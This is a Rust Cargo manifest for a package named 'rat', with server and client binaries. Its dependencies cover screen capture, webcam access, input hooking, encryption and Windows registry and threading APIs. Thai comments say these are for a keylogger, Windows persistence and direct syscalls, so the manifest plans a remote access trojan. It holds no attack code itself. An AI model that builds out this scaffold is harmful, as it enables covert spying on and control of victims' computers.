[package]
name = "rat"
version = "1.0.0"
edition = "2021"

[[bin]]
name = "server"
path = "src/server.rs"

[[bin]]
name = "client"
path = "src/main.rs"

[dependencies]
tokio = { version = "1.38", features = ["full"] }
aes-gcm = "0.10"
rand = "0.8"
serde = { version = "1.0", features = ["derive"] }
serde_json = "1.0"
scrap = "0.5"
nokhwa = "0.10"
rdev = "0.5"  # สำหรับ keylogger
winreg = "0.52"  # สำหรับ persistence บน Windows
windows = { version = "0.52", features = ["Win32_System_Threading", "Win32_Foundation", "Win32_System_Diagnostics_Debug"] }  # สำหรับ direct syscalls
toml = "0.8"
hex = "0.4"